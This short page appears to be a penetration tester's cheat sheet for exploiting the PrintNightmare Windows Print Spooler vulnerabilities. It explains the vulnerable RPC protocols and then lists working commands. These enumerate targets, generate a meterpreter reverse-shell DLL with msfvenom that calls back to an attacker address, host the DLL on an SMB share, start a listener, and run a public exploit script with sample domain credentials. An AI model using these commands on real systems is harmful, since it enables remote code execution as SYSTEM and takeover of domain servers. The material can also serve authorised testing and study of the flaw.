PrintNightmare
ABOUT
PrintNightmare is the nickname given to two vulnerabilities (CVE-2021-34527 and CVE-2021-1675) found in the Print Spooler service that runs on all Windows operating systems.
Basically it's just RCE as SYSTEM, via printer driver DLL injection through RPC interface of Print Spooler.
Print Spooler is a Microsoft built-in service that manages printing jobs. It is enabled by default and runs within the SYSTEM context.
MS-RPRN – The main protocol for managing printers and print jobs remotely. It handles tasks like listing printers, sending print jobs, and configuring settings.
MS-PAR – Adds support for asynchronous operations to improve performance. It allows non-blocking calls, like getting print job updates without waiting.
MS-PAN – An extension to MS-RPRN that supports newer features. It enables enhanced printer capabilities used in modern Windows systems.
Prerequisites
Print Spooler enabled on target (e.g., DC or file server)
RPC/SMB access (ports 135, 445)
Attacker has write access to printer driver path
FLOW
Create a malicious DLL
Host SMB share, or put DLL into accessible share
Trigger DLL install via RPC call
Catch reverse shell or payload (Or do anything depends on your payload)
LINUX
MS-RPRN Enum
rpcdump.py @13.13.13.13 | egrep 'MS-RPRN|MS-PAR'DLL Payload Generation
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=13.13.13.13 LPORT=8080 -f dll > defnotsusfile.dllCreating a share
sudo smbserver.py -smb2support CompData /path/to/defnotsusfile.dllTurning on multi/handler
msf >> use exploit/multi/handler
...Running exploit [LINK]
sudo python3 CVE-2021-1675.py militech.local/sreed:password123@13.13.13.13 '\\13.13.13.13\CompData\defnotsusfile.dll'